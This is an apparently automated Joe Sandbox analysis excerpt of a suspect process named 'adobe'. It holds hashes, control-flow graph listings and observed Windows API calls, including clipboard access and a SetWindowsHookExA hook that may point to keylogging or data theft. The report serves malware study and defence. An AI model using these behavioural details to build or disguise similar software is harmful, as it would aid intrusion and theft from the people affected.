                        • Instruction ID: 93aa96e1a81ae1ed4e93481ffb2a3108156a81ee98825e2a54412322d5348aa6
                        • Opcode Fuzzy Hash: 1616f710e475809a88385e214bcc51316eee36bb7eaad3b473108d6342560449
                        • Instruction Fuzzy Hash: DD029E34B002059FDB54EFA8D990BAEB7E2EF84314F148469E406DB395DB31ED86CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f7000517d963d48f30402f2fd6f369961a4a0b9d0b6f178e0db262b5731292c
                        • Instruction ID: af32bb24fd3e0ade93f3f1228a49b18eff2de6fc95198c08347be90a960239eb
                        • Opcode Fuzzy Hash: 0f7000517d963d48f30402f2fd6f369961a4a0b9d0b6f178e0db262b5731292c
                        • Instruction Fuzzy Hash: 8F925534A003048FDB64DB68C194A9DBBF2FB45314F5884A9E44AEB365DB35ED86CF90
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7203d29f2f3b1e70a566212d68e3865ee142d7f150b2f4600dced0f68d219b87
                        • Instruction ID: 02f26092c83207ac3f10a636b576167e0aaba8821aef6b25a89a34bba68afd58
                        • Opcode Fuzzy Hash: 7203d29f2f3b1e70a566212d68e3865ee142d7f150b2f4600dced0f68d219b87
                        • Instruction Fuzzy Hash: C062BD34A002049FDB54DB68D594BAEB7F2EF88314F188469E406EB395DB35ED82CF90
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a1c74d5d274e2e86af8951c5fd8908fd8672ff4b202872a2a4432575462c5ab
                        • Instruction ID: 45d0dbad6820bdbd4b251dedbeb9f5c873a9cc20f29dee6cc7f8c64a3d247ee1
                        • Opcode Fuzzy Hash: 1a1c74d5d274e2e86af8951c5fd8908fd8672ff4b202872a2a4432575462c5ab
                        • Instruction Fuzzy Hash: 58326F34B002099FDB54EF68D990BAEB7B2EB88314F248525E405EB355DB35EC86CF91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e2ab73d9b8c7ecc4a456c1687f038af4b9a33ce27b1013fe63c42a97a9f482e
                        • Instruction ID: c7be43d360c0fd82654252685c15b68a94eb9a99d6c807ac737bd1326c8aac33
                        • Opcode Fuzzy Hash: 0e2ab73d9b8c7ecc4a456c1687f038af4b9a33ce27b1013fe63c42a97a9f482e
                        • Instruction Fuzzy Hash: 5D12D131F003159BDB64DB64D8907AEBBB2EB85310F14846AE85BEB345DA34EC46CB91
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 245ee9a0bfc75bde67ed437258b5836285899fd2922b3c62d1a38c3c622dd26c
                        • Instruction ID: e071f48d1d92529b7696aefe9dc6469ba46325a58e473639dfc29ee992550398
                        • Opcode Fuzzy Hash: 245ee9a0bfc75bde67ed437258b5836285899fd2922b3c62d1a38c3c622dd26c
                        • Instruction Fuzzy Hash: 99227030E002098FDF64DFA8D5907AEB7B6EB85310F248926E459EB395CA35EC85CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 66aac40-66aac5e 1 66aac60-66aac63 0->1 2 66aac73-66aac76 1->2 3 66aac65-66aac6e 1->3 4 66aac78-66aac94 2->4 5 66aac99-66aac9c 2->5 3->2 4->5 6 66aac9e-66aacb1 5->6 7 66aacb6-66aacb9 5->7 6->7 9 66aacbb-66aacc8 7->9 10 66aaccd-66aacd0 7->10 9->10 11 66aacda-66aacdd 10->11 12 66aacd2-66aacd7 10->12 15 66aacdf-66aace8 11->15 16 66aacf7-66aacfa 11->16 12->11 18 66aacee-66aacf2 15->18 19 66aae77-66aaeae 15->19 20 66aae5d-66aae66 16->20 21 66aad00-66aad03 16->21 18->16 29 66aaeb0-66aaeb3 19->29 20->15 24 66aae6c-66aae76 20->24 22 66aad14-66aad16 21->22 23 66aad05-66aad09 21->23 27 66aad18 22->27 28 66aad1d-66aad20 22->28 23->24 26 66aad0f 23->26 26->22 27->28 28->1 30 66aad26-66aad4a 28->30 31 66aaec0-66aaec3 29->31 32 66aaeb5-66aaeb9 29->32 44 66aae5a 30->44 45 66aad50-66aad5f 30->45 35 66aaee6-66aaee9 31->35 36 66aaec5-66aaee1 31->36 33 66aaebb 32->33 34 66aaeef-66aaf2a 32->34 33->31 46 66ab11d-66ab130 34->46 47 66aaf30-66aaf3c 34->47 35->34 38 66ab152-66ab155 35->38 36->35 41 66ab162-66ab165 38->41 42 66ab157-66ab161 38->42 48 66ab167 call 66ab198 41->48 49 66ab174-66ab176 41->49 44->20 58 66aad61-66aad67 45->58 59 66aad77-66aadb2 call 66a6510 45->59 53 66ab132 46->53 60 66aaf3e-66aaf57 47->60 61 66aaf5c-66aafa0 47->61 57 66ab16d-66ab16f 48->57 51 66ab178 49->51 52 66ab17d-66ab180 49->52 51->52 52->29 54 66ab186-66ab190 52->54 53->38 57->49 62 66aad6b-66aad6d 58->62 63 66aad69 58->63 75 66aadca-66aade1 59->75 76 66aadb4-66aadba 59->76 60->53 77 66aafbc-66aaffb 61->77 78 66aafa2-66aafb4 61->78 62->59 63->59 89 66aadf9-66aae0a 75->89 90 66aade3-66aade9 75->90 79 66aadbe-66aadc0 76->79 80 66aadbc 76->80 84 66ab0e2-66ab0f7 77->84 85 66ab001-66ab0dc call 66a6510 77->85 78->77 79->75 80->75 84->46 85->84 97 66aae0c-66aae12 89->97 98 66aae22-66aae53 89->98 93 66aadeb 90->93 94 66aaded-66aadef 90->94 93->89 94->89 100 66aae16-66aae18 97->100 101 66aae14 97->101 98->44 100->98 101->98
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: 0c38f438c3e9b3768f0bcdb14794d2cc6e23c78cc6d0e1f219b69574d2cad23e
                        • Instruction ID: 6aa7d3aa923fc73a747fd39a3b9d11f15df64bbd45ad3a67bdd10fe90712451f
                        • Opcode Fuzzy Hash: 0c38f438c3e9b3768f0bcdb14794d2cc6e23c78cc6d0e1f219b69574d2cad23e
                        • Instruction Fuzzy Hash: 44E14C30E003098FDB69DFA9D4946AEB7B2EF85304F24852AD406DB355DB71EC86CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2392861976
                        • Opcode ID: baa5e6de7fddfefa5977d85c72f93233c70c42f2111da7e770d7e4d52291b2ab
                        • Instruction ID: 478d7a82513d4d5c95e1b2dfa25601dbbe1f985b46d792abd540858d299c1bd4
                        • Opcode Fuzzy Hash: baa5e6de7fddfefa5977d85c72f93233c70c42f2111da7e770d7e4d52291b2ab
                        • Instruction Fuzzy Hash: 1F024B30E002098FDBA4DF68D5906ADB7B2FB85310F24896AD41ADB355DB71EC85CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 425 66a90c8-66a90ed 426 66a90ef-66a90f2 425->426 427 66a90f8-66a910d 426->427 428 66a99b0-66a99b3 426->428 434 66a910f-66a9115 427->434 435 66a9125-66a913b 427->435 429 66a99d9-66a99db 428->429 430 66a99b5-66a99d4 428->430 432 66a99dd 429->432 433 66a99e2-66a99e5 429->433 430->429 432->433 433->426 437 66a99eb-66a99f5 433->437 438 66a9119-66a911b 434->438 439 66a9117 434->439 442 66a9146-66a9148 435->442 438->435 439->435 443 66a914a-66a9150 442->443 444 66a9160-66a91d1 442->444 445 66a9152 443->445 446 66a9154-66a9156 443->446 455 66a91fd-66a9219 444->455 456 66a91d3-66a91f6 444->456 445->444 446->444 461 66a921b-66a923e 455->461 462 66a9245-66a9260 455->462 456->455 461->462 467 66a928b-66a92a6 462->467 468 66a9262-66a9284 462->468 473 66a92cb-66a92d9 467->473 474 66a92a8-66a92c4 467->474 468->467 475 66a92db-66a92e4 473->475 476 66a92e9-66a9363 473->476 474->473 475->437 482 66a93b0-66a93c5 476->482 483 66a9365-66a9383 476->483 482->428 487 66a939f-66a93ae 483->487 488 66a9385-66a9394 483->488 487->482 487->483 488->487
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 2f938f14c8fd0a7869e70e679ef9e383188fe6fb24ee9d4b2cbe150261061ead
                        • Instruction ID: 83709def7902485f0cdc9d5bd3e3e11ef305902f792ce727a7e8d946b2087d54
                        • Opcode Fuzzy Hash: 2f938f14c8fd0a7869e70e679ef9e383188fe6fb24ee9d4b2cbe150261061ead
                        • Instruction Fuzzy Hash: F6914C34B1061A9FDB54DF65D9507AEB3F6AF89304F248569C409EB388EB30AC468F91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 491 66acec8-66acee3 492 66acee5-66acee8 491->492 493 66aceea-66aceef 492->493 494 66acef2-66acef5 492->494 493->494 495 66acf3e-66acf41 494->495 496 66acef7-66acf39 494->496 497 66acf8a-66acf8d 495->497 498 66acf43-66acf85 495->498 496->495 500 66acf8f-66acfd1 497->500 501 66acfd6-66acfd9 497->501 498->497 500->501 503 66acfdb-66acfdd 501->503 504 66acfe8-66acfeb 501->504 507 66ad26f-66ad278 503->507 508 66acfe3 503->508 509 66acfed-66ad02f 504->509 510 66ad034-66ad037 504->510 514 66ad27a-66ad27f 507->514 515 66ad287-66ad293 507->515 508->504 509->510 512 66ad039-66ad07b 510->512 513 66ad080-66ad083 510->513 512->513 517 66ad0cc-66ad0cf 513->517 518 66ad085-66ad0c7 513->518 514->515 520 66ad299-66ad2ad 515->520 521 66ad3a4-66ad3a9 515->521 523 66ad118-66ad11b 517->523 524 66ad0d1-66ad113 517->524 518->517 537 66ad2b3-66ad2c5 520->537 538 66ad3b1 520->538 521->538 532 66ad121-66ad124 523->532 533 66ad3b4-66ad3c0 523->533 524->523 542 66ad126-66ad142 532->542 543 66ad147-66ad14a 532->543 535 66ad14c-66ad15b 533->535 536 66ad3c6-66ad6b3 533->536 545 66ad16a-66ad176 535->545 546 66ad15d-66ad162 535->546 703 66ad8da-66ad8e4 536->703 704 66ad6b9-66ad6bf 536->704 566 66ad2e9-66ad2eb 537->566 567 66ad2c7-66ad2cd 537->567 538->533 542->543 543->535 544 66ad193-66ad196 543->544 555 66ad198-66ad19a 544->555 556 66ad1a5-66ad1a8 544->556 553 66ad17c-66ad18e 545->553 554 66ad8e5-66ad91e 545->554 546->545 553->544 579 66ad920-66ad923 554->579 555->538 563 66ad1a0 555->563 564 66ad1aa-66ad1ec 556->564 565 66ad1f1-66ad1f4 556->565 563->556 564->565 576 66ad211-66ad214 565->576 577 66ad1f6-66ad20c 565->577 586 66ad2f5-66ad301 566->586 573 66ad2cf 567->573 574 66ad2d1-66ad2dd 567->574 584 66ad2df-66ad2e7 573->584 574->584 580 66ad25d-66ad25f 576->580 581 66ad216-66ad225 576->581 577->576 587 66ad946-66ad949 579->587 588 66ad925-66ad941 579->588 593 66ad261 580->593 594 66ad266-66ad269 580->594 589 66ad227-66ad22c 581->589 590 66ad234-66ad240 581->590 584->586 605 66ad30f 586->605 606 66ad303-66ad30d 586->606 600 66ad94b-66ad977 587->600 601 66ad97c-66ad97f 587->601 588->587 589->590 590->554 599 66ad246-66ad258 590->599 593->594 594->492 594->507 599->580 600->601 609 66ad98e-66ad990 601->609 610 66ad981 call 66ada3d 601->610 613 66ad314-66ad316 605->613 606->613 615 66ad992 609->615 616 66ad997-66ad99a 609->616 621 66ad987-66ad989 610->621 613->538 618 66ad31c-66ad338 call 66a6510 613->618 615->616 616->579 622 66ad99c-66ad9ab 616->622 634 66ad33a-66ad33f 618->634 635 66ad347-66ad353 618->635 621->609 628 66ad9ad-66ada10 call 66a6510 622->628 629 66ada12-66ada27 622->629 628->629 634->635 635->521 637 66ad355-66ad3a2 635->637 637->538 705 66ad6ce-66ad6d7 704->705 706 66ad6c1-66ad6c6 704->706 705->554 707 66ad6dd-66ad6f0 705->707 706->705 709 66ad8ca-66ad8d4 707->709 710 66ad6f6-66ad6fc 707->710 709->703 709->704 711 66ad70b-66ad714 710->711 712 66ad6fe-66ad703 710->712 711->554 713 66ad71a-66ad73b 711->713 712->711 716 66ad74a-66ad753 713->716 717 66ad73d-66ad742 713->717 716->554 718 66ad759-66ad776 716->718 717->716 718->709 721 66ad77c-66ad782 718->721 721->554 722 66ad788-66ad7a1 721->722 724 66ad8bd-66ad8c4 722->724 725 66ad7a7-66ad7ce 722->725 724->709 724->721 725->554 728 66ad7d4-66ad7de 725->728 728->554 729 66ad7e4-66ad7fb 728->729 731 66ad80a-66ad825 729->731 732 66ad7fd-66ad808 729->732 731->724 737 66ad82b-66ad844 call 66a6510 731->737 732->731 741 66ad853-66ad85c 737->741 742 66ad846-66ad84b 737->742 741->554 743 66ad862-66ad8b6 741->743 742->741 743->724
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q
                        • API String ID: 0-831282457
                        • Opcode ID: 49ce539c64bd30710be43b01c5deca1f6a4d01dca595549bce12359f756629c0
                        • Instruction ID: d7ed5e0191dbcdda1b7031ac004d5e6f965cf1d957f9e8f3e9a9d658493e2aa6
                        • Opcode Fuzzy Hash: 49ce539c64bd30710be43b01c5deca1f6a4d01dca595549bce12359f756629c0
                        • Instruction Fuzzy Hash: 8F624F34A002159FCB55EF68D580A5EB7B2FF84304F248A69D009DF769DB71ED8ACB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 751 66a4b18-66a4b3c 753 66a4b3e-66a4b41 751->753 754 66a5220-66a5223 753->754 755 66a4b47-66a4c3f 753->755 756 66a5244-66a5246 754->756 757 66a5225-66a523f 754->757 775 66a4cc2-66a4cc9 755->775 776 66a4c45-66a4c92 call 66a53c0 755->776 758 66a5248 756->758 759 66a524d-66a5250 756->759 757->756 758->759 759->753 761 66a5256-66a5263 759->761 777 66a4ccf-66a4d3f 775->777 778 66a4d4d-66a4d56 775->778 789 66a4c98-66a4cb4 776->789 795 66a4d4a 777->795 796 66a4d41 777->796 778->761 793 66a4cbf-66a4cc0 789->793 794 66a4cb6 789->794 793->775 794->793 795->778 796->795
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: fcq$XPcq$\Ocq
                        • API String ID: 0-3575482020
                        • Opcode ID: 4e925d48af8b2161dc122032c66d053589efd4622d8e1548b73251f20b24ac16
                        • Instruction ID: 4febf4274b8f792a81c101f1afe6af9283a7d2f09f43c2dfa663c699d684fa08
                        • Opcode Fuzzy Hash: 4e925d48af8b2161dc122032c66d053589efd4622d8e1548b73251f20b24ac16
                        • Instruction Fuzzy Hash: 36615030F002099FEB549FA5C8547AEBAF6EF88300F20842AD106EB395DF759D458F91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 799 e1ed30-e1ed4b 800 e1ed75-e1ed8b 799->800 801 e1ed4d-e1ed74 799->801 821 e1ed8d call e1ed30 800->821 822 e1ed8d call e1ee18 800->822 804 e1ed92-e1ed94 805 e1ed96-e1ed99 804->805 806 e1ed9a-e1edf9 804->806 813 e1edfb-e1edfe 806->813 814 e1edff-e1ee8c GlobalMemoryStatusEx 806->814 817 e1ee95-e1eebd 814->817 818 e1ee8e-e1ee94 814->818 818->817 821->804 822->804
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4096285249.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_e10000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: h
                        • API String ID: 0-2439710439
                        • Opcode ID: 71da98735a28d260e199063bce56425ae71c7e1db180dfa92d599261b5987c6e
                        • Instruction ID: 567b8fc48f49ea973403594f701dc8ba8f0b2a53e67876a1de8770a16102ee75
                        • Opcode Fuzzy Hash: 71da98735a28d260e199063bce56425ae71c7e1db180dfa92d599261b5987c6e
                        • Instruction Fuzzy Hash: 9941F471D043958FCB10CFB9D8046DABFF5EF8A310F1885ABD445AB251DB749885CBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 965 66a90b9-66a90ed 966 66a90ef-66a90f2 965->966 967 66a90f8-66a910d 966->967 968 66a99b0-66a99b3 966->968 974 66a910f-66a9115 967->974 975 66a9125-66a913b 967->975 969 66a99d9-66a99db 968->969 970 66a99b5-66a99d4 968->970 972 66a99dd 969->972 973 66a99e2-66a99e5 969->973 970->969 972->973 973->966 977 66a99eb-66a99f5 973->977 978 66a9119-66a911b 974->978 979 66a9117 974->979 982 66a9146-66a9148 975->982 978->975 979->975 983 66a914a-66a9150 982->983 984 66a9160-66a91d1 982->984 985 66a9152 983->985 986 66a9154-66a9156 983->986 995 66a91fd-66a9219 984->995 996 66a91d3-66a91f6 984->996 985->984 986->984 1001 66a921b-66a923e 995->1001 1002 66a9245-66a9260 995->1002 996->995 1001->1002 1007 66a928b-66a92a6 1002->1007 1008 66a9262-66a9284 1002->1008 1013 66a92cb-66a92d9 1007->1013 1014 66a92a8-66a92c4 1007->1014 1008->1007 1015 66a92db-66a92e4 1013->1015 1016 66a92e9-66a9363 1013->1016 1014->1013 1015->977 1022 66a93b0-66a93c5 1016->1022 1023 66a9365-66a9383 1016->1023 1022->968 1027 66a939f-66a93ae 1023->1027 1028 66a9385-66a9394 1023->1028 1027->1022 1027->1023 1028->1027
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115790362.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_66a0000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q
                        • API String ID: 0-355816377
                        • Opcode ID: 4f6bbe5887f3d68adbf43ae9bb4b1041976b942c2605d80847424536140c9ebd
                        • Instruction ID: 7c158a6b703eb2bf4df7a0b19301f3962458a221733cd3888d82a4cd672229ff
                        • Opcode Fuzzy Hash: 4f6bbe5887f3d68adbf43ae9bb4b1041976b942c2605d80847424536140c9ebd
                        • Instruction Fuzzy Hash: 6B512B34B106099FDB54DBB5DD90BAEB3F6AB89744F148569C409EB388EA30DC42CF91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1075 6692e4e-6692e56 1076 6692e58-6692e5d 1075->1076 1077 6692e5e-6692ebe 1075->1077 1076->1077 1078 6692ec9-6692ed0 1077->1078 1079 6692ec0-6692ec6 1077->1079 1080 6692edb-6692f13 1078->1080 1081 6692ed2-6692ed8 1078->1081 1079->1078 1082 6692f1b-6692f7a CreateWindowExW 1080->1082 1081->1080 1083 6692f7c-6692f82 1082->1083 1084 6692f83-6692fbb 1082->1084 1083->1084 1088 6692fc8 1084->1088 1089 6692fbd-6692fc0 1084->1089 1090 6692fc9 1088->1090 1089->1088 1090->1090
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06692F6A
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: baa177e67df8cc52a564f18164b127408edb2a75b5ab782de06e91b901769390
                        • Instruction ID: 947811208e420931eece75e6c2ee83719bbc4dd51681ace38a6bf4cc06d1f7ed
                        • Opcode Fuzzy Hash: baa177e67df8cc52a564f18164b127408edb2a75b5ab782de06e91b901769390
                        • Instruction Fuzzy Hash: 8E51C2B1D10349AFDF14CFA9D894ADEBBB5BF48314F24812AE819AB210D7719945CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1091 6692e58-6692ebe 1093 6692ec9-6692ed0 1091->1093 1094 6692ec0-6692ec6 1091->1094 1095 6692edb-6692f7a CreateWindowExW 1093->1095 1096 6692ed2-6692ed8 1093->1096 1094->1093 1098 6692f7c-6692f82 1095->1098 1099 6692f83-6692fbb 1095->1099 1096->1095 1098->1099 1103 6692fc8 1099->1103 1104 6692fbd-6692fc0 1099->1104 1105 6692fc9 1103->1105 1104->1103 1105->1105
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06692F6A
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: cd83621eee76e61f2e308d1658773b09500d76f3a59caa760803baa5ab3fc3b4
                        • Instruction ID: 72af8b13a9559661db657f45758affea3f8168f13dfabd51d7f1f51e50bec3e4
                        • Opcode Fuzzy Hash: cd83621eee76e61f2e308d1658773b09500d76f3a59caa760803baa5ab3fc3b4
                        • Instruction Fuzzy Hash: D841C2B1D10309AFDF14CF99C884ADEBBB5FF88314F24812AE819AB210D7719985CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1106 6696694-6697964 1109 669796a-669796f 1106->1109 1110 6697a14-6697a34 call 669170c 1106->1110 1112 6697971-66979a8 1109->1112 1113 66979c2-66979fa CallWindowProcW 1109->1113 1117 6697a37-6697a44 1110->1117 1120 66979aa-66979b0 1112->1120 1121 66979b1-66979c0 1112->1121 1115 66979fc-6697a02 1113->1115 1116 6697a03-6697a12 1113->1116 1115->1116 1116->1117 1120->1121 1121->1117
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 066979E9
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: 2e5d9f54d0faee9c9484268b2a8c70e569fd36e3b5fc3da104dec34f6828f773
                        • Instruction ID: 538724ce9a08900d8fb134adf733c9d90ef207fe8ffce5f2c9d000d3decbd3a4
                        • Opcode Fuzzy Hash: 2e5d9f54d0faee9c9484268b2a8c70e569fd36e3b5fc3da104dec34f6828f773
                        • Instruction Fuzzy Hash: 694128B5A10309CFDB54CF59C488AAABBF9FB88314F248499D519AB321D334A941CFA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1136 669866c-66986c8 1137 66986d2-6698710 OleGetClipboard 1136->1137 1138 6698719-6698767 1137->1138 1139 6698712-6698718 1137->1139 1144 6698769-669876d 1138->1144 1145 6698777 1138->1145 1139->1138 1144->1145 1146 669876f 1144->1146 1147 6698778 1145->1147 1146->1145 1147->1147
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: c00325a9b53f46af33d0409ce07c4b3102a7ab27c7a2e26659b38ea0ff37ac97
                        • Instruction ID: 343c068fb7705113b8e2b601d608d0864cee92eb203733f83fe4f6bf28b03231
                        • Opcode Fuzzy Hash: c00325a9b53f46af33d0409ce07c4b3102a7ab27c7a2e26659b38ea0ff37ac97
                        • Instruction Fuzzy Hash: EC3112B0E01248EFDB10CFA8C984BDDBBF5AB49304F208459E404BB394D7756985CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1123 66980a8-6698710 OleGetClipboard 1126 6698719-6698767 1123->1126 1127 6698712-6698718 1123->1127 1132 6698769-669876d 1126->1132 1133 6698777 1126->1133 1127->1126 1132->1133 1134 669876f 1132->1134 1135 6698778 1133->1135 1134->1133 1135->1135
                        APIs
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: b66bcb8eaaad4a8a80a802cb25fda206fa73d04837991f97bfe21a628e7d9e3b
                        • Instruction ID: 0b23bce59278c67c865353dfd494cbe169757647a42427b9f4c59fe91bd5b2a9
                        • Opcode Fuzzy Hash: b66bcb8eaaad4a8a80a802cb25fda206fa73d04837991f97bfe21a628e7d9e3b
                        • Instruction Fuzzy Hash: 8A3101B0E01208EFDB50CF99C984B9EBBF9AB49304F208459E405BB394D7B56985CBA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1148 6696a90-6696a97 1149 6696a98-6696b2c DuplicateHandle 1148->1149 1150 6696b2e-6696b34 1149->1150 1151 6696b35-6696b52 1149->1151 1150->1151
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06696B1F
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 96e33b4f97e1b4db4b08973f6a44058145d4cf9b4af32a6ca2c82cceb1fa75dd
                        • Instruction ID: e8bf166daf9844046ff09f0b7b275210c4ad99032140df6c8f8cdd312bcc8233
                        • Opcode Fuzzy Hash: 96e33b4f97e1b4db4b08973f6a44058145d4cf9b4af32a6ca2c82cceb1fa75dd
                        • Instruction Fuzzy Hash: EB21E4B5901358AFDB10CFAAD984ADEBFF9EB48320F14801AE954A3310D374A950CFA5
                        APIs
                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 0669A343
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_6690000_adobe.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: c6002bbb4e2979376d6e9e961496a58c41aca5e0b2073cf95efa3234552619b2
                        • Instruction ID: 3068629b78952846f3fdbab1ab31ff134424c7739436367d1c38559986baaede
                        • Opcode Fuzzy Hash: c6002bbb4e2979376d6e9e961496a58c41aca5e0b2073cf95efa3234552619b2
                        • Instruction Fuzzy Hash: DD2147B5D002098FCB54CFAAD844BEEFBF9BB88310F148429E458A7350C775A944CFA1
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06696B1F
                        Memory Dump Source
                        • Source File: 00000008.00000002.4115681849.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
